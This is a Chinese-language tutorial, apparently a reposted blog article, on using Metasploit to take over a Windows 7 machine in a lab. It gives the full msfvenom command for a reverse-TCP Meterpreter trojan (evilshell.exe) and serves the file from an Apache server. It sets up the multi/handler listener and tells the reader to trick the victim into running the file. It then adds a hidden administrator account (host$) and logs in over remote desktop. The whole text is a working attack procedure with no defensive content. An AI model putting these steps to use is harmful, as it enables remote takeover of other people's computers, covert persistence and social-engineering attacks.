admin 管理员组文章数量: 887839
一、环境准备
攻击机:kali IP:192.168.63.53
靶机:Windows 7 IP:192.168.63.128
1、保证两台机器间可以互相ping通
2、关闭Windows防火墙、kali防火墙
二、kali生成木马
1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.63.53 lport=5555 -f exe >/home/ices/桌面/evilshell.exe
参数解释:
-p -playload 攻击成功后做什么
-p ,-payload Payload to use:指定哪些有效载荷生成
-f, -format Output format:指定有效载荷的格式
-f 后跟要生成后门文件的类型
2、将木马文件evilshell.exe拷贝到/var/www/html,把html目录下的其余文件删除,并开启apache服务(提供一个可以把木马文件下载的平台)
cp evilshell.exe /var/www/html 拷贝木马文件到/var/www/html
rm -f index.html 删除index.html
rm -f insex.nginx-debian.html 删除index.html
3、在靶机上打开浏览器,访问站点http://192.168.63.53(kali的IP地址),并下载木马文件到桌面
4、开启postgresql服务,,postgresql的端口号为5432,开启MSF(msfconsole的缩写)
/etc/init.d/postgresql status 查看postgresql服务的状态
/etc/init.d/postgresql start 开启postgresql服务
netstat -ntulp 查看端口
msfconsole 开启MSF
5、加载exploits和payloads, 该模块需要设置的参数
msf5>use exploit/multi/handler 选择exploits
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload
show options 查看所需设置的参数
6、设置监听IP和端口,要与生成木马中的命令中的lhost和lport一致
set lhost 192.168.63.53 设置监听地址
set lport 5555 设置监听端口
run 或者exploit 运行攻击模块
7、在靶机中诱导用户点击exe程序(社会工程学攻击),在kali中就会得到靶机的shell(meterpreter)
Windows环境下中文乱码解决办法:chcp 437
8、在靶机中加入一个隐藏用户($),提升隐藏用户权限
(注:靶机需登录管理员账户,否则无法添加成功)
net user host$ /add 添加隐藏用户host$
net user 查看用户
net user host$ 密码 为host$用户设置密码
net localgroup administrators host$ /add 将host$用户加入到管理员组中,从而提升权限
net user host$ 查看host$用户信息
9、新打开一个终端,使用远程桌面连接靶机,进行操作
rdesktop 192.168.63.128
连接失败的原因:靶机没有允许远程连接
重新连接靶机,连接成功,使用隐藏用户登录靶机
进入远程桌面
本文标签: 木马 系统 Metasploit Windows
版权声明:本文标题:使用Metasploit生成木马控制Windows系统 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1735375337h1720282.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论